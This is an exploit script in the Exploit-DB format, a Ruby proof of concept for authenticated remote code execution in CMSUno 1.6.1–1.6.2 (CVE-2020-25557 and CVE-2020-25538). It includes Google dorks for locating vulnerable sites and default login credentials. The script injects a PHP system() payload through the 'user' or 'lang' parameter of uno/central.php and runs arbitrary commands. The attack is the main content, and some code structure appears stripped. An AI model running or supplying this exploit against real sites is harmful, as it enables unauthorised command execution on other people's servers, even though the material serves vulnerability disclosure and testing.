# Exploit Title: CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated)
# Google Dorks:
# inurl:uno/central.php
# inurl:uno/config.php
# inurl:uno.php intitle:"CMSUno - Login"
# Exploit Author: noraj (Alexandre ZANNI) for SEC-IT (https://secit.fr) https://www.exploit-db.com/?author=10066
# Vendor Homepage: https://www.boiteasite.fr/cmsuno.html
# Software Link: https://github.com/boiteasite/cmsuno/archive/1.6.2.tar.gz
# Version: 1.6.1, 1.6.2
# Tested on: docker image: php:7.4-apache (Debian buster)
# CVE : CVE-2020-25557 & CVE-2020-25538
# Vulnerabilities
## Discoverer: Fatih Çelik
## Discoverer website: https://fatihhcelik.blogspot.com
## Vulnerability 1:
## Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
## CVE: CVE-2020-25557
## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html
## Vulnerability 2:
## Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
## CVE: CVE-2020-25538
## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html
#!/usr/bin/env ruby
require 'httpclient'
require 'docopt'
# username = 'cmsuno'
# password = '654321'
# root_url = 'http://localhost:5000/'
# command = 'pwd'
doc = <<~DOCOPT
CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)
#{__FILE__} -r <url> -c <cmd> [-u <username>] [-p <password>] [-t <tech>] [--debug]
#{__FILE__} -H | --help
-r <url>, --root-url <url>Root URL (base path) including HTTP scheme, port and root folder
-u <username>, --user <username>user name (if not default: cmsuno)
-p <password>, --pass <password>User password (if not default: 654321)
-c <cmd>, --command <cmd> Command to execute on the target
-t <tehc>, --technique <tech> Technique: exploiting 'user' param (default, with output) or 'lang' param (blind)
--debug Display arguments
-h, --helpShow this screen
#{__FILE__} -r http://example.org -c id
#{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang
# Get anti-CSRF token
def get_unox(client, auth_status)
print '[*] Fetching anti-CSRF token: '
res = client.get(LOGIN_URL)
case auth_status
when false
regexp = /name="unox" value="([a-f0-9]{32}?)"/
when true
regexp = /Unox='([a-f0-9]{32}?)'/
token = regexp.match(res.body).captures[0].chomp
puts token
return token
def login(client, user, pass)
data = {
'unox' => get_unox(client, false),
'user' => user,
'pass' => pass,
puts '[*] Logging in'
res = client.post(LOGIN_URL, data)
return res.body
def exploit(client, user, pass, cmd, tech)
payload = "#{user}\";$pass='#{pass}';system('#{cmd}');?>// "
case tech
when 'user'
data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en"
when 'lang'
data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}"
raise 'Wrong exploitation technique argument value'
headers = {
'X-Requested-With' => 'XMLHttpRequest'
#client.proxy = 'http://localhost:8080'
puts "[*] Starting exploitation, using '#{tech}' param technique"
client.post(VULNERABLE_URL, data, headers)
# Login again to trigger uno/password.php
clnt2 = HTTPClient.new
return login(clnt2, user, pass).lines[..-2].join
args = Docopt.docopt(doc)
pp args if args['--debug']
username = args['--user'] || 'cmsuno'
password = args['--pass'] || '654321'
technique = args['--technique'] || 'user'
LOGIN_URL = "#{args['--root-url']}/uno.php"
VULNERABLE_URL = "#{args['--root-url']}/uno/central.php"
clnt = HTTPClient.new
login(clnt, username, password)
output = exploit(clnt, username, password, args['--command'], technique)
print '[*] Command output:'
case technique
when 'user'
puts "\n#{output}"
when 'lang'
puts ' blind RCE, no output with this exploitation technique'
rescue Docopt::Exit => e
puts e.message